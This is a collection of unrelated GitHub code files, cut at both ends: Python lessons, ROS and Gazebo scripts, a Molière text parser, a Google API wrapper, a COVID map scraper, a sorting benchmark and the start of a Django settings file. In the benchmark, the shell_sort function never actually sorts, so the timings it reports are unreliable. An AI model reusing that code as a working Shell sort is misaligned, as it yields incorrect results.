값 추가\r\nprint(\"짝수 값 :\", data)\r\n\r\n# ex3) 1 ~ 100 사이에서 5의배수 이면서 3의배수가 아닌값만 append 하기\r\ncnt = 0\r\ndata = []\r\nwhile cnt < 100 :\r\n cnt += 1\r\n if cnt % 5 == 0 and cnt % 3 != 0 :\r\n data.append(cnt)\r\nprint(\"5의배수 이면서 3의배수가 아닌값 :\", data)\r\n# 5의배수 이면서 3의배수가 아닌값 : [5, 10, 20, 25, 35, 40, 50, 55, 65, 70, 80, 85, 95, 100]\r\n\r\n''' 무한 loop -> 종료 조건 \r\n종료 조건 : 0이면 종료한다.'''\r\nwhile True :\r\n num = int(input(\"숫자 입력 : \"))\r\n if num == 0 :\r\n print(\"프로그램 종료\")\r\n break # 탈출(exit) : 종료 조건\r\n print(\"num =\", num)\r\n\r\n# random : 난수 생성\r\nimport random # 난수 생성 모듈\r\nhelp(random.random) # random() -> x in the interval [0, 1).\r\nhelp(random.choice) # Choose a random element from a non-empty sequence.\r\nhelp(random.randint) # Return random integer in range [a, b], including both end points.\r\nr = random.randint(1,5) # 모듈.함수 (1~5 난수)\r\nprint(r)\r\nr = random.random() # 모듈.함수(0~1 난수)\r\nprint('r =', r)\r\n'''r = 0.7022488599032701\r\n r = 0.9936632464625869\r\n r = 0.3603851296759477'''\r\n\r\n# ex4) 난수 0.01미만이면 프로그램 종료, 아니면 난수 개수 출력\r\ncnt = 0\r\nwhile True :\r\n r = random.random()\r\n cnt += 1\r\n if r < 0.01 :\r\n print(\"프로그램 종료\")\r\n break\r\nprint(\"난수 갯수 :\", cnt, \"개 \\n r :\", r)\r\n'''프로그램 종료\r\n난수 갯수 : 36 개\r\n r : 0.009539250499327023\r\n프로그램 종료\r\n난수 갯수 : 178 개\r\n r : 0.006572568922237676 '''\r\n# 똑같음\r\ncnt = 0\r\nwhile True :\r\n r = random.random()\r\n if r < 0.01 :\r\n print(\"프로그램 종료\")\r\n break\r\n else :\r\n cnt += 1\r\nprint(\"난수 갯수 :\", cnt, \"개\")\r\n'''프로그램 종료\r\n난수 갯수 : 176 개'''\r\n\r\n\r\n# 게임 만들어보기\r\nprint(\">>> 숫자 맞추기 게임 <<<\")\r\n'''\r\n숫자 범위 : 1 ~ 10\r\nmyInput == computer : 성공(exit) -> 종료 조건 \r\nmyInput > computer : '더 작은 수 입력'\r\nmyInput < computer : ' 더 큰 수 입력'\r\n'''\r\ncomputer = random.randint(1,10)\r\nwhile True :\r\n myInput = int(input(\"예상 숫자 입력 : \")) # 사용자 입력\r\n if myInput == computer :\r\n print('~~성공~~')\r\n break\r\n elif myInput > computer :\r\n print('~~더 작은 수 입력~~')\r\n else :\r\n print('~~더 큰 수 입력~~')\r\n'''예상 숫자 입력 : >? 5\r\n~~더 작은 수 입력~~\r\n예상 숫자 입력 : >? 4\r\n~~더 작은 수 입력~~\r\n예상 숫자 입력 : >? 2\r\n~~성공~~'''\r\n\r\n\r\n'''\r\ncontinue vs break\r\n - 반복문에서 사용되는 명령어\r\n - continue : 반복을 지속\r\n - break : 반복을 멈춤\r\n'''\r\ni = 0\r\nwhile i < 10 :\r\n i += 1\r\n if i == 3 or i == 6 :\r\n continue # 다음 문장으로 skip\r\n if i == 9 :\r\n break\r\n print(i, end=' , ')\r\n# 1 , 2 , 4 , 5 , 7 , 8 ,\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap02_Control_lecture/step02_while.py","file_name":"step02_while.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38258989496","text":"#!/usr/bin/env python\n\n\nimport math\nfrom math import sin, cos, pi\n\nimport rospy\nimport tf\nfrom std_msgs.msg import Time\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3\n\nrospy.init_node(\"pub_node\")\n\npub2 = rospy.Publisher('/husky_velocity_controller/odom', Odometry, queue_size=50)\n\nodom_broadcaster = tf.TransformBroadcaster()\n\nx = 0.0\ny = 0.0\nth = 0.0\n\nvx = 0.1\nvy = -0.1\nvth = 0.1\n\ncurrent_time = rospy.Time.now()\nlast_time = rospy.Time.now()\n\nr = rospy.Rate(1.0)\n\nwhile not rospy.is_shutdown():\n\tdt = (current_time - last_time).to_sec()\n\tdelta_x = (vx * cos(th) - vy * sin(th)) * dt\n\tdelta_y = (vx * sin(th) + vy * cos(th)) * dt\n\tdelta_th = vth * dt\n\n\tx += delta_x\n\ty += delta_y\n\tth += delta_th\n\n\todom_quat = tf.transformations.quaternion_from_euler(0, 0, th)\n\n\todom_broadcaster.sendTransform(\n\t\t(x, y, 0.),\n\t\todom_quat,\n\t\tcurrent_time,\n\t\t\"base_link\",\n\t\t\"odom\"\n\t)\n\n\todom = Odometry()\n\todom.header.stamp = current_time\n\todom.header.frame_id = \"odom\"\n\n\todom.pose.pose = Pose(Point(x, y, 0.), Quaternion(*odom_quat))\n\n\todom.child_frame_id = \"base_link\"\n\todom.twist.twist = Twist(Vector3(vx, vy, 0), Vector3(0, 0, vth))\n\n\tpub2.publish(odom)\n\n\tlast_time = current_time\n\tr.sleep()","repo_name":"FOSCAR-2020/ISCC_2020","sub_path":"etc/gps_test/google_map_gps_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"36101036710","text":"import re\nimport os\nimport sys\nimport regex\n\nfilename = sys.argv[1]\n# garder seulement le nom de fichier sans path.\ntitle = os.path.basename(filename)\ntitle = re.sub(\".txt\", \"\", title)\nstr = \"\"\nperson = \"\" # la personne qui parle.\ni = 0\nfin = open(title + \"_input.txt\", \"w\")\nfout = open(title + \"_target.txt\", \"w\")\nfres = open(title + \"_res.txt\", \"w\")\np1 = []\np2 = []\npr1 = []\npr2 = []\n\ndef chomp(x):\n if x.endswith(\"\\r\\n\"): return x[:-2]\n if x.endswith(\"\\n\") or x.endswith(\"\\r\"): return x[:-1]\n return x\n\nwith open(filename, 'r') as f:\n begin = False\n start = False\n skip = False\n input = False\n for line in f:\n if skip:\n skip = not skip\n continue\n if \"Scène\" in line:\n start = True\n skip = True\n if not start:\n continue\n if line == \"\\n\" or \"#\" in line or \"<\" in line or \"SCÈNE\" in line or \"===\" in line:\n continue\n if re.match(' ', line): # ligne avec la personne\n input = not input\n person = line.strip()\n person = re.sub('\\.', '', person) # supprimer les points\n person = re.sub(',.*', '', person) # supprimer les personne a qui parle\n if input:\n fin.write(person + \"\\n\")\n else:\n fout.write(person + \"\\n\")\n begin = True\n i = 0\n continue\n if begin == True:\n str = line.strip().lower()\n str = \"\".join(str)\n str = re.sub('\"', '', str)\n if len(str) > 120:\n str = re.sub(', ', '\\n', str)\n str = re.sub('\\. ', \".\\n\", str)\n str = re.sub('\\.\\* ', \".\\n*\", str)\n str = re.sub(': ', ':\\n', str)\n str = re.sub(', \\*', ',\\n*', str)\n str = re.sub('\\? ', '?\\n', str)\n str = re.sub(\"! \", \"!\\n\", str)\n str = re.sub('et ', '\\net ', str)\n str = re.sub(', \\*', ',\\n*', str)\n str = re.sub('; ', '\\n', str)\n str = re.sub('mais ', '\\nmais ', str)\n splited = str.split('\\n')\n str = \"\"\n strl = \"\"\n i = 0\n enter = False\n final = False\n while i < len(splited):\n strl = splited[i].strip()\n while len(strl) <= 60:\n i += 1\n if i >= len(splited):\n final = True\n break\n strl += ' ' + splited[i]\n enter = True\n if final:\n break\n strl += '\\n'\n enter = False\n i += 1\n str += strl\n # print(str)\n i += 1\n # if i % 2 == 0:\n # str += \"\\n\"\n if input:\n fin.write(chomp(str) + '\\n')\n else:\n fout.write(chomp(str) + '\\n')\nfin.close()\nfout.close()\n\nwith open(title + \"_input.txt\", 'r') as f:\n for line in f:\n if regex.match('^\\w[[:upper:]]', line): # ligne avec la personne\n p1.append(pr1)\n pr1 = []\n i = 0\n continue\n pr1.append(chomp(line))\n\nwith open(title + \"_target.txt\", 'r') as f:\n for line in f:\n if regex.match('^\\w[[:upper:]]', line): # ligne avec la personne\n p2.append(pr2)\n pr2 = []\n i = 0\n continue\n pr2.append(chomp(line))\n\n\nnp1 = []\nnp2 = []\nfor i in range(len(p1)):\n t1 = []\n for n in range(0, len(p1[i]), 2):\n if ((n + 1) % len(p1[i]) != 0):\n t1.append(p1[i][n] + ' ' + p1[i][n + 1])\n else:\n t1.append(p1[i][n])\n if len(t1) != 0:\n np1.append(t1)\n \nfor i in range(len(p2)):\n t2 = []\n for n in range(0, len(p2[i]), 2):\n if ((n + 1) % len(p2[i]) != 0):\n t2.append(p2[i][n] + ' ' + p2[i][n + 1])\n else:\n t2.append(p2[i][n])\n if len(t2) != 0:\n np2.append(t2)\n\n# print(len(np1))\n# print(len(np2))\nm = min(len(np1), len(np2))\nfor i in range(m):\n maxi = max(len(np1[i]), len(np2[i]))\n for n in range(maxi):\n fres.write('\"' + np1[i][n % len(np1[i])] + '\"' + ',' + '\"' + np2[i][n % len(np2[i])] + '\"' + '\\n')\nfres.close()\n","repo_name":"emilraducanu/litte_bot","sub_path":"Data/Old_format/parseur_moliere_new.py","file_name":"parseur_moliere_new.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36530373972","text":"import random\n\nrock = \"\"\"\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n\"\"\"\n\npaper = \"\"\"\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n\"\"\"\n\nscissors = \"\"\"\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n\"\"\"\n\nhand = [rock, paper, scissors]\nhands = [\"rock\", \"paper\", \"scissors\"]\n\nuserInput = int(\n input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\")\n)\nnpcInput = random.randint(0, 2)\n\nif userInput > 2:\n print(\"Enter a valid number.\")\n exit()\nelse:\n userHand = hands[userInput]\n npcHand = hands[npcInput]\n\n print(f\"You chose {userHand}\\n{hand[userInput]}\")\n print(f\"NPC chose {npcHand}\\n{hand[npcInput]}\")\n\n if userHand == npcHand:\n print(\"Draw\")\n elif userHand == \"rock\":\n if npcHand == \"paper\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n elif userHand == \"paper\":\n if npcHand == \"scissors\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n elif userHand == \"scissors\":\n if npcHand == \"rock\":\n print(\"You lose.\")\n else:\n print(\"You win!\")\n","repo_name":"miguel-tostado/100_Days_of_Code_Python","sub_path":"day_4/day_4_project.py","file_name":"day_4_project.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16318453817","text":"# 环境必须安装过httpie\n# python 3.5 后调用 要加上 --ignore-stdin\n# 命令行调用http请求\nimport time\nimport subprocess\n\ncommand1 =\"ipconfig /all\"\n\ncommand2 =\"http devcoder.cn -h --ignore-stdin\"\n\n# subprocess.call(command1, shell = True)\nif __name__ == '__main__':\n while(True):\n subprocess.call(command2, shell = True)\n time.sleep(1)\n","repo_name":"AllenCoder/Python","sub_path":"httpies.py","file_name":"httpies.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10935605018","text":"\"\"\"\nFunctions for Google API\n\"\"\"\n\nimport json\nimport logging\nimport time\n\nfrom googleapiclient import errors\nfrom googleapiclient.discovery import build, DISCOVERY_URI\n\n_REQUIRED_CONFIG_KEYS = frozenset((\"auth_uri\", \"token_uri\", \"client_id\"))\n\n\nclass GoogleApi(object):\n \"\"\"Google API helper object\"\"\"\n\n def __init__(self, api=\"oauth2\", version=\"v2\", scopes=None, **kwargs):\n \"\"\"constructor\"\"\"\n if scopes is None:\n scopes = ['https://www.googleapis.com/auth/analytics.readonly']\n self.api = api\n self.api_version = version\n self.scopes = scopes\n self.credentials = kwargs.get('credentials')\n self._service = None\n self.discovery_url = kwargs.get('discovery_url', DISCOVERY_URI)\n self.retries = kwargs.get('retries', 3)\n self.log = logging.getLogger(\"__name__\")\n\n @property\n def service(self):\n \"\"\"get or create a api service\"\"\"\n if self._service is None:\n # self.log.debug(f\"Creating a service for {self.api} API\")\n self._service = build(self.api,\n self.api_version,\n credentials=self.credentials,\n cache_discovery=False,\n discoveryServiceUrl=self.discovery_url)\n return self._service\n\n def retry(self, service_method, retry_count=0):\n \"\"\"retry a google api call and check for rate limits\n \"\"\"\n try:\n return service_method.execute(num_retries=retry_count)\n except errors.HttpError as e:\n code = e.resp.get('code')\n # reason = ''\n message = ''\n try:\n data = json.loads(e.content.decode('utf-8'))\n code = data['error'][\"code\"]\n message = data['error']['message']\n # reason = data['error']['errors'][0]['reason']\n except: # noqa\n pass\n if code == 403 and \"rate limit exceeded\" in message.lower():\n self.log.debug(\"rate limit reached, sleeping for %s seconds\", 2 ** retry_count)\n time.sleep(2 ** retry_count)\n return self.retry(service_method, retry_count + 1)\n else:\n self.log.debug(f\"got HttpError (content={data}\")\n raise\n except BrokenPipeError:\n self.log.debug(\"BrokenPipeError occurred but attempting to retry\")\n return self.retry(service_method, retry_count + 1)\n except KeyboardInterrupt:\n raise\n except: # noqa\n self.log.exception(\"Failed to execute api method\")\n raise\n\n def __getattr__(self, name):\n \"\"\"get attribute or service wrapper\n :param name: attribute / service name\n :return:\n \"\"\"\n return getattr(MethodHelper(self, self.service), name)\n\n\nclass MethodHelper(object):\n \"\"\"helper to streamline api calls\"\"\"\n\n def __init__(self, google_api, service, name=None, path=None):\n \"\"\"create a method helper\n :param google_api GoogleApi instance of api\n :param service Google API service (GoogleApi.service) or method of it\n :param name method name\n :param path API path i.e. for compute: instances.list\n \"\"\"\n self.google_api = google_api\n self.service = service\n self.name = name\n self.path = path if path is not None else []\n if name is not None:\n self.path.append(name)\n # print(\"constructor %s\", name)\n\n def execute(self, *args, **kwargs):\n \"\"\"execute service api\"\"\"\n # self.log.info(\"execute %s\", self.name)\n return self.google_api.retry(self.service)\n\n def call(self, *args, **kwargs):\n \"\"\"wrapper for service methods\n this wraps an GoogleApi.service call so the next level can also use helpers\n i.e. for compute v1 api GoogleApi.service.instances() can be used as Google.instances()\n and will return a MethodHelper instance\n \"\"\"\n # self.log.info(\"call %s\", self.name)\n return MethodHelper(self.google_api, getattr(self.service, self.name)(*args, **kwargs))\n\n def __getattr__(self, name):\n \"\"\"get service method\"\"\"\n # self.log.info(\"getattr %s\", name)\n if not hasattr(self.service, name):\n err_msg = u\"API method {} unknown on {} {}\".format(u\".\".join(self.path + [name]),\n self.google_api.api,\n self.google_api.api_version)\n raise RuntimeError(err_msg)\n return MethodHelper(self.google_api, self.service, name, self.path).call\n","repo_name":"mak00s/megaton","sub_path":"megaton/google_api.py","file_name":"google_api.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1368932236","text":"from text_handlers import *\nfrom pandas import read_csv\n\ndata_dir = '/home/justin/.local/share/xdg/media/documents/textfiles/galvanize/slur-prediction/'\nfilename='data_with_n_grams.csv'\n\ndata = read_csv(data_dir+filename)\n\nblowup_cols = [col for col in data if col.endswith('gram')]\n\nfor col in blowup_cols:\n data = make_dummies(data,col)\n\nprint(data.shape)\n","repo_name":"justin-riley/slur-prediction","sub_path":"src/data_pipeline.py","file_name":"data_pipeline.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32358953312","text":"#Python内置的访问数据库\nimport requests\n#pyecharts图表库导入(Map地图,Line折线图,Bar柱形图)\nfrom pyecharts import Map,Line,Bar\n#将json导入\nimport json\n\n#生成地图使用的数据--腾讯\nmapUrl=\"https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5&callback=jQuery34100282751706540052_1583633749228&_=1583633749229\"\n\n#发送请求获取数据--地图数据\nmapData=requests.get(mapUrl).text.replace('\"{','{').replace('}\"})','}})').replace(\"\\\\\",\"\")\nmapData=mapData[mapData.index(\"(\")+1:-1]\n#print(type(mapData))\n#print(mapData)\n#将处理完的数据转换成Python字典\ntempMapData=json.loads(mapData)\n#各个省份的数据:每个省份的数据也是一个字典对象\nchain_provinces=tempMapData[\"data\"][\"areaTree\"][0][\"children\"]\nprint(chain_provinces)\n#保存省份名称列表\nprovince_names=[]\n#保存各个省份的确诊数据\nprovince_data=[]\nfor province in chain_provinces:\n province_names.append(province[\"name\"])\n province_data.append(province[\"total\"][\"confirm\"])\nmap=Map(\"全国疫情分布图\",width=1200,height=600)\n#第一参数:标题#第二参数:省份列表(list)#第三参数:数据列表(list)#visual_range:左侧颜色柱范围\n# #is_visualmap:是否显示颜色柱范围#visual_text_color:颜色柱初始颜色#is_label_show:文本颜色\nmap.add(\"\",province_names,province_data,maptype='china',visual_range=[0,1000],\n is_visualmap=True,\n visual_text_color='#000',is_label_show=True)\n#地图的配置参数\nmap.show_config()\n#渲染地图\nmap.render(path=\"output/全国疫情分布图.html\")\n\n\n\n\n\n\n","repo_name":"licaige/firstPython","sub_path":"txRealtime/TengXunRealtimeES.py","file_name":"TengXunRealtimeES.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74402476391","text":"#!/usr/bin/env python \n\nimport random\nimport rospy\nimport time\nimport tf\n\nfrom gazebo_msgs.msg import ModelState\n\nrospy.wait_for_service('gazebo/set_model_state')\n\npub = rospy.Publisher('/gazebo/set_model_state', ModelState, queue_size=10)\nrospy.init_node('mover', anonymous=True)\ntime.sleep(1)\nmessage=ModelState()\nmessage.model_name = \"shelf\"\nmessage.pose.position.x = random.uniform(4,6)\nmessage.pose.position.y = random.uniform(-2,2)\nquat=tf.transformations.quaternion_from_euler(0,0,random.uniform(4, 5.5))\nmessage.pose.orientation.x=quat[0]\nmessage.pose.orientation.y=quat[1]\nmessage.pose.orientation.z=quat[2]\nmessage.pose.orientation.w=quat[3]\nmessage.reference_frame=\"world\"\npub.publish(message)","repo_name":"BogdanCATANGIU/Knock_Robot","sub_path":"src/gen_random.py","file_name":"gen_random.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21161887587","text":"import time\r\nimport random\r\n\r\ndef insertion_sort(a_list):\r\n start = time.time()\r\n for index in range(1, len(a_list)):\r\n current_value = a_list[index]\r\n position = index\r\n while position > 0 and a_list[position - 1] > current_value:\r\n a_list[position] = a_list[position - 1]\r\n position = position - 1\r\n a_list[position] = current_value\r\n return time.time()-start \r\n\r\n\r\ndef shell_sort(a_list):\r\n start = time.time()\r\n sublist_count = len(a_list) // 2\r\n while sublist_count > 0:\r\n for start_position in range(sublist_count):\r\n sublist_count = sublist_count // 2\r\n return time.time()-start\r\n\r\n\r\ndef python_sort(a_list):\r\n start = time.time()\r\n a_list.sort()\r\n return time.time() - start\r\n\r\n\r\ndef main():\r\n for item in [500,1000,10000]:\r\n insr_sort = 0.0\r\n shl_sort = 0.0\r\n py_sort = 0.0 \r\n for i in range(0,100): \r\n a_list=[]\r\n for s in range(1,item):\r\n a_list.append(random.randint(1,100))\r\n insr_sort += insertion_sort(a_list)\r\n shl_sort += shell_sort(a_list)\r\n py_sort += python_sort(a_list)\r\n print(\"For \"+str(item)+\" Size :\") \r\n print(\"Insertion Sort took %10.7f seconds to run, on average\" % (insr_sort/100))\r\n print(\"Shell Sort took %10.7f seconds to run, on average\" % (shl_sort/100))\r\n print(\"Python Sort took %10.7f seconds to run, on average\" % (py_sort/100)) \r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"chena726/IS211_Assignment4","sub_path":"sort_compare.py","file_name":"sort_compare.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71897220073","text":"my_file = open('kalinichenko.txt', 'w')\n\nlines = []\nwhile True:\n l = input('Please insert the elements. For end insert empty space \" \": ')\n if l != ' ':\n lines.append(l + '\\n')\n else:\n my_file.writelines(lines)\n print('Input is finished. Open the file.')\n break\n\n#my_file.close()\n\n#while True:\n# line = input('Enter - ').split()\n# if not line:\n# break\n# with open('text.txt', 'a') as my_file:\n# for i in range(len(line)):\n# print(line[i]], file=my_file) \n","repo_name":"funfounder/python_basics","sub_path":"less05_task01.py","file_name":"less05_task01.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73315480873","text":"\"\"\"\n @file test_block_bingo_coordinate.py\n @author T.Miyaji\n @brief block_bingo_coordinateのテストコード\n\"\"\"\nimport pytest\nfrom BlockBingoCoordinate import Color\nfrom BlockBingoCoordinate import BlockCirclesCoordinate\nfrom BlockBingoCoordinate import CrossCirclesCoordinate\n\ndef create_block_circles(is_left = True, bonus = 6, color = 3, black = 5):\n return BlockCirclesCoordinate(is_left, bonus, color, black)\n\n\ndef check_block_circles_size(coordinate):\n # ブロックサークルが8個あることを確認\n assert len(coordinate.block_circles) == 8\n # ブロックサークルの色が1~8番サークルまで格納されていることを確認\n assert len(coordinate.block_circle_color) == 8\n\n\ndef test_init_block_circles_coordinate_left():\n \"\"\"\n Lコースのブロックサークルの座標と色を格納するデータ構造が正しく生成できることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n check_block_circles_size(coordinate)\n\n\ndef test_init_block_circles_coordinate_right():\n \"\"\"\n Rコースのブロックサークルの座標と色を格納するデータ構造が正しく生成できることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n check_block_circles_size(coordinate)\n \ndef test_init_block_circles_coordinate_error_bounus():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(bonus=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(bonus=9)\n\ndef test_init_block_circles_coordinate_error_color():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(color=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(color=9)\n\ndef test_init_block_circles_coordinate_error_black():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles(black=0)\n with pytest.raises(ValueError):\n coordinate = create_block_circles(black=9)\n\ndef test_get_block_circles_coordinate_error_right():\n \"\"\"\n 誤ったブロックサークル番号を指定したとき、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = create_block_circles()\n coordinate.get(9)\n \ndef test_get_block_circles_coordinate_get_color_circle():\n \"\"\"\n コンストラクタで設定したカラーブロックが置かれているサークルを返す。\n \"\"\"\n color_circle_number = 2 # ブロックサークル番号は適当\n coordinate = create_block_circles(color=color_circle_number)\n assert coordinate.get_color_circle() == color_circle_number\n\ndef test_get_block_circles_coordinate_get_black_circle():\n \"\"\"\n コンストラクタで設定した黒ブロックが置かれているサークルを返す。\n \"\"\"\n black_circle_number = 2 # ブロックサークル番号は適当\n coordinate = create_block_circles(black=black_circle_number)\n assert coordinate.get_black_circle() == black_circle_number\n\ndef test_colors():\n \"\"\"\n ブロックサークル番号のリストを指定したとき、正しく指定したブロックサークルの色が返ることを確認する。\n \"\"\"\n coordinate = create_block_circles()\n assert [Color.YELLOW, Color.GREEN] == coordinate.colors([1, 2])\n assert [Color.YELLOW, Color.GREEN, Color.RED, Color.YELLOW, Color.BLUE] == coordinate.colors([1, 2, 3, 5, 8])\n\n\n\ndef test_init_cross_circle_corrdinate():\n \"\"\"\n 交点サークルの座標を格納するデータ構造を作成したとき、はじめは配置ブロックの色がすべてNONEになっていることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n for y in range(3+1):\n for x in range(3+1):\n assert coordinate.cross_circles[x, y] == Color.NONE\n\n\ndef test_set_block_color():\n \"\"\"\n 交点サークルに置かれたブロックの色を設定すると、データ構造の要素も正しく変わることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n point = (0,0)\n coordinate.set_block_color(point, Color.RED)\n assert coordinate.color(point) == Color.RED\n\n\ndef test_set_block_color_error():\n \"\"\"\n 誤った座標を指定して交点サークルに置かれたブロックの色を取得した場合、例外が送出されることを確認する。\n \"\"\"\n with pytest.raises(ValueError):\n coordinate = CrossCirclesCoordinate()\n coordinate.set_block_color((-1,0), Color.BLUE)\n\n\ndef test_goal_node():\n \"\"\"\n 走行体の初期位置とブロックサークルの座標を指定すると、ブロックを設置するための交点サークルの座標が正しく返ることを確認する。\n \"\"\"\n cross_circles = CrossCirclesCoordinate()\n block_circles = create_block_circles()\n\n assert (1,2) == cross_circles.goal_node((1,1), block_circles.get(3))\n assert (1,2) == cross_circles.goal_node((1,1), block_circles.get(5))\n assert (2,1) == cross_circles.goal_node((2,1.5), block_circles.get(7))\n assert (1,0) == cross_circles.goal_node((3,0), block_circles.get(1))\n\n\ndef test_move_block_of_cross_circle():\n \"\"\"\n 交点サークルに置かれたブロックを移動させたとき、データ構造の要素がNONEになることを確認する。\n \"\"\"\n coordinate = CrossCirclesCoordinate()\n point = (0,0)\n coordinate.set_block_color(point, Color.BLUE)\n assert coordinate.color(point) == Color.BLUE\n\n coordinate.move_block(point)\n assert coordinate.color(point) == Color.NONE\n\n\ndef test_start_node():\n coordinate = CrossCirclesCoordinate()\n # 現実的にはありえないが、交点サークルのすべてに緑色のブロックを配置する\n for x in range(0, 3+1):\n for y in range(0, 3+1):\n coordinate.set_block_color((x,y), Color.GREEN)\n \n # 走行体の現在地から最も近い交点サークルの座標を返すことを確認する。\n assert ((1,1), 0) == coordinate.start_node((1.5,1), [Color.GREEN])\n assert ((1,1), 0) == coordinate.start_node((1,1), [Color.GREEN])\n\n # 指定色のブロックが置いてある交点サークルがない場合は、Noneが返ることを確認する。\n assert None == coordinate.start_node((1,1), [Color.RED])\n\n # 1つだけ青色のブロックを置いて、正しく処理できるか確認す���\n coordinate.set_block_color((0,2), Color.BLUE)\n assert ((2,0), 2) == coordinate.start_node((2.5,0), [Color.RED, Color.BLUE, Color.GREEN])\n assert ((0,2), 1) == coordinate.start_node((2.5, 0), [Color.YELLOW, Color.BLUE])","repo_name":"KatLab-MiyazakiUniv/CameraSystem","sub_path":"source/block_bingo/test_block_bingo_coordinate.py","file_name":"test_block_bingo_coordinate.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14185437146","text":"#!/usr/bin/env python\n# import the time library for the sleep function\nimport time\n\n# import the GoPiGo3 drivers\nimport easygopigo3 as easy\n\n# Create an instance of the GoPiGo3 class.\n# GPG will be the GoPiGo3 object.\ngpg = easy.EasyGoPiGo3()\n\n# Put a grove button in port AD1\nmy_button = gpg.init_button_sensor(\"AD1\")\n\nprint(\"Ensure there's a button in port AD1\")\nprint(\"Press and release the button as often as you want\")\nprint(\"the program will run for 2 minutes or\")\nprint(\"Ctrl-C to interrupt it\")\n\n\nstart = time.time()\nRELEASED = 0\nPRESSED = 1\nstate = RELEASED\n\nwhile time.time() - start < 120:\n\n if state == RELEASED and my_button.read() == 1:\n print(\"PRESSED\")\n gpg.open_eyes()\n state = PRESSED\n if state == PRESSED and my_button.read() == 0:\n print(\"RELEASED\")\n gpg.close_eyes()\n state = RELEASED\n time.sleep(0.05)\n\nprint(\"All done!\")\n","repo_name":"DexterInd/GoPiGo3","sub_path":"Software/Python/Examples/easy_Button.py","file_name":"easy_Button.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"72"} +{"seq_id":"6389284618","text":"import os\nimport django_heroku\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = {\n **dotenv_values(\".env.shared\"), # load shared development variables\n **dotenv_values(\".env.secret\"), # load sensitive variables\n **os.environ, # override loaded values with environment variables\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'whitenoise.runserver_nostatic',\n 'django.contrib.staticfiles',\n\n 'drf_yasg',\n 'rest_framework',\n 'corsheaders',\n 'django_filters',\n\n 'lemka.apps.LemkaConfig',\n\n 'storages',\n]\n\nSWAGGER_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Bearer': {\n 'type': 'apiKey',\n 'name': 'Authorization',\n 'in': 'header'\n }\n }\n}\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 